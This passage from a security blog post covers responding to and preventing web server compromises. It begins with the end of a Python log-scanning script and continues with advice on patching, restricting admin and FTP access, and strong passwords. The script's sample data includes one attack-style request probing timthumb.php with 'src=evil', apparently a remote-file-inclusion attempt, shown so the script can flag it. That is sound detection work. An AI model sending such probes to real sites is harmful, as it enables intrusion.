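    '203.0.113.7 - - [10/Dec/2011:10:00:05 -0200] "GET /wp-content/themes/x/timthumb.php?src=evil HTTP/1.1" 200 33 "-" "libwww-perl/6.03"',
]

if __name__ == "__main__":
    counts, hits = summarise(SAMPLE_LOG)
    for ip, n in counts.most_common():
        print(ip, n, "flagged request(s)")
```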
<strong>
</strong><br />
<br />
<div style="text-align: left;">
<span style="font-weight: bold;"><br /></span></div>
<strong></strong><br />
<div style="text-align: left;">
<strong style="font-weight: bold;">4 - Updates and access restriction</strong><b> </b><br />Keeping the environment up to date is a good practice that is rarely followed, mostly out of fear, especially when the environment is highly critical (e.g. DBMSs). On Linux, <a href="http://blog.alexos.com.br/?p=1501">cron-apt</a> (Debian and derivatives) and <a href="http://spacewalk.redhat.com/">Spacewalk</a> (RedHat and derivatives) help a lot; Windows systems have good old WSUS, which usually sits forgotten without the attention it deserves.
Restrict access to the site's administrative areas (e.g. wp-admin, admin, administration) and to FTP, thereby avoiding brute-force attacks. Another good practice is the use of strong passwords; this sounds quite clichéd, but after analysing a few administrative areas I found ridiculous passwords in use.
<br /><strong>Conclusion</strong><br />
These tips only show the path to follow. Experience, common sense and continuous study are the factors that make the difference in resolving incidents and in preventing them.</div>
<br />
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Last tip: <strong>TOOLS FAIL</strong>.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="background-color: #fafafa; color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 19px; text-align: justify;">Post by: @alexandrosilva</span></div>Unknownnoreply@blogger.com1